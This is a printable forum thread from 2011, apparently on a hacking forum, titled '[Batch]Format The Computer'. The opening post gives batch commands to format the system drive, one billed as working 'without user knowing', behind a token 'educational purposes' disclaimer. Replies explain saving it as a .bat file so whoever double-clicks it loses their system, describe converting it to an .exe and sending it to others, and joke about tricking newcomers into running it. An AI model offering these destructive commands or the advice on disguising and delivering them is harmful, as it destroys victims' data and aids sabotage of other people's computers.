Sinisterly
[Batch]Format The Computer - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: Coding (https://sinister.ly/Forum-Coding--71)
+--- Thread: [Batch]Format The Computer (/Thread-Batch-Format-The-Computer)



[Batch]Format The Computer - 1234hotmaster - 03-30-2011

WARNING: Do not use this on your or other people's computers. I'm not responsible for any action you do with this nor is this website. This is for educational purposes only! If you don't agree close this page and return to your home page immediately.









Format With User Knowing (
Fast Speed ):
Spoiler: Code
Code:
Format %systemdrive% /AUTOTEST /X





Format Without User Knowing (
Slow Speed ):
Spoiler: Code
Code:
Format %systemdrive% /Q /X









Please don't leech thank you Smile




RE: [Batch]Format The Computer - syabrembo - 03-30-2011

nice one mate,thnx ^_--


RE: [Batch]Format The Computer - FunKx - 03-30-2011

Ok, then what do we suppose to do with it, if not to test it on our or other computer? Biggrin
Just see the code? Biggrin


RE: [Batch]Format The Computer - 1llusion - 03-30-2011

(03-30-2011, 04:11 PM)FunKx Wrote: Ok, then what do we suppose to do with it, if not to test it on our or other computer? Biggrin
Just see the code? Biggrin

learn from the code Smile Tongue its useful in case some noob tries to hack you with his L33T V1RUS Smile (actually, funnier is to convert it to .exe and sending it back to him, done this few times Biggrin )


RE: [Batch]Format The Computer - Shadow Hunter - 03-31-2011

create a notepad and copy paste the code in it.then save it as format.bat . work done whoever double clicks it his system will get formatted.


RE: [Batch]Format The Computer - mikahlamka - 04-01-2011

(03-31-2011, 01:57 PM)shadow hunter Wrote: create a notepad and copy paste the code in it.then save it as format.bat . work done whoever double clicks it his system will get formatted.

thank for teaching how to do it!:thumbs:


RE: [Batch]Format The Computer - pal62 - 04-02-2011

This is good info to use when I need it...thanks


RE: [Batch]Format The Computer - Enc0de - 04-05-2011

(03-30-2011, 04:11 PM)FunKx Wrote: Ok, then what do we suppose to do with it, if not to test it on our or other computer? Biggrin
Just see the code? Biggrin

LMFAO @ FunKx
To all noobs who want to test if this actually workes DO NOT DOUBLE CLICK IT. MAKE SURE YOU TRIPLE CLICK IT.


RE: [Batch]Format The Computer - ayya6645 - 04-14-2011

good work bro.. thnx